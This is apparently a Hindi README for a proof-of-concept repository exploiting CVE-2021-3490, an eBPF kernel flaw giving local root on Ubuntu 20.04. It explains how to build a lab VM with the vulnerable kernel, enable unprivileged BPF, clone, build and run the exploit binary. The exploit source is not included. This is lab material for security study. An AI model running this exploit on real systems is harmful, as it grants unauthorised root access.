
CVE-2021-3490 के लिए अवधारणा-प्रमाण शोषण, एक Linux kernel eBPF कमजोरी जो Ubuntu 20.04 पर कर्नेल 5.8.0-50 के साथ स्थानीय विशेषाधिकार वृद्धि को रूट तक सक्षम करती है।
श्रेय: https://github.com/chompie1337
Ubuntu Releases से ubuntu-20.04.6-live-server-amd64.iso डाउनलोड करें और वर्चुअल मशीन में इंस्टॉल करें।
wget https://releases.ubuntu.com/20.04/ubuntu-20.04.6-live-server-amd64.iso
ISO इंस्टॉल करने के बाद, Ubuntu सर्वर को वर्चुअल मशीन में पूरी तरह इंस्टॉल करें और निम्नलिखित कमांड चलाएँ।
sudo apt update
sudo apt install linux-image-5.8.0-50-generic linux-headers-5.8.0-50-generic linux-modules-5.8.0-50-generic linux-modules-extra-5.8.0-50-generic build-essential git libelf-dev
sudo nano /etc/default/grub
# Remove the hidden line and set grub_timeout = 15
नए इंस्टॉल किए गए कर्नेल में रीबूट करें और निम्नलिखित कमांड चलाएँ:
echo "kernel.unprivileged_bpf_disabled=0" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p
फिर इस रिपॉजिटरी को वर्चुअल मशीन में क्लोन करें।
git clone https://github.com/prabeershakya/CVE-2021-3490-POC.git
अब POC डायरेक्ट्री में जाएँ और निम्नलिखित कमांड चलाएँ।
make groovy
अंत में रूट एक्सेस प्राप्त करने के लिए यह कमांड चलाएँ !!
chmod +x ./bin/exploit.bin
./bin/exploit.bin